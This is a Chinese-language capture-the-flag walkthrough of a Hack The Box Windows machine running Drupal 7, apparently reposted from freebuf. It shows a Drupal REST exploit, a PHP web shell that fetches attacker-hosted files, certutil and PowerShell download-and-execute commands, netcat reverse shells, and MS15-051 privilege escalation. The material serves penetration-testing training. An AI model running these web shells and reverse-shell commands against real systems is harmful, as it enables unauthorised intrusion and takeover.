基础信息
简介:Hack The Box是一个在线渗透测试平台。可以帮助你提升渗透测试技能和黑盒测试技能,平台环境都是模拟的真实环境,有助于自己更好的适应在真实环境的渗透
链接:https://www.hackthebox.eu/home/machines/profile/7
描述:
一、信息收集
1、靶机ip
IP地址为:10.129.115.58
2、靶机端口与服务
nmap -sV -A -O -T4 10.129.115.58
开放了80,135和49154端口,并且可知80端口是由Drupal 7 CMS搭建的服务器
3、网站信息收集
进入80端口,通过robots.txt找到CHANGELOG.txt知道Drupal 的具体版本
可以通过该该版本查询存在的攻击载荷
二、漏洞探测与利用
通过searchsploit查询可利用版本
利用该脚本之前需要对该脚本进行修改
通过dirb扫描目录获取发现存在/rest目录
执行脚本前需要安装php-curl否则无法运行成功
apt-get install php-curl
命令执行成功
反弹shell
方法一:通过certutil命令将nc下载到靶机中
http://10.129.115.43/shell.php?cmd=certutil -urlcache -f http://10.10.14.58:8001/nc64.exe nc64.exe 下载nc
http://10.129.115.43/shell.php?cmd=nc64.exe 10.10.14.58 1234 -e cmd 反弹shell
成功获取shell
方法二:编写php代码(由于重启了靶机所以ip地址不一样)
利用php编写文件上传代码将nc64.exe上传到靶机中进行利用
$url = 'http://10.129.115.154';
$endpoint_path = '/rest';
$endpoint = 'rest_endpoint';
$phpCode = <<<'EOD'
<?php
if (isset($_REQUEST['fupload'])) {
file_put_contents($_REQUEST['fupload'], file_get_contents("http://10.10.14.16:8001/" . $_REQUEST['fupload']));
};
if (isset($_REQUEST['cmd'])) {
echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>";
};
?>
EOD;
$file = [
'filename' => 'exploit.php',
'data' => $phpCode
];
脚本执行成功,上传nc
http://10.129.115.154/exploit.php?fupload=nc64.exe
执行nc64.exe 获取shell
三、提权
systeminfo查询该计算机的相关信息
使用Sherlock.ps1查找系统缺少的版本补丁与漏洞
链接:https://github.com/rasta-mouse/Sherlock
在运行该脚本前需要在脚本中添加Find-ALLvulns查找所有漏洞
http://10.129.115.58/shell.php?cmd=echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.58:8001/Sherlock.ps1') | powershell -noprofile -
这次使用MS15-051进行提权
将ms15-051×64.exe下载到靶机中并命名为Shell.exe
使用nc反弹shell
certutil -urlcache -f http://10.10.14.58:8000/ms15-051x64.exe Shell.exe
Shell.exe "nc64.exe 10.10.14.58 4242 -e cmd.exe"
成功获取到root权限
来源:freebuf.com 2021-03-18 13:27:16 by: WAFmax
请登录后发表评论
注册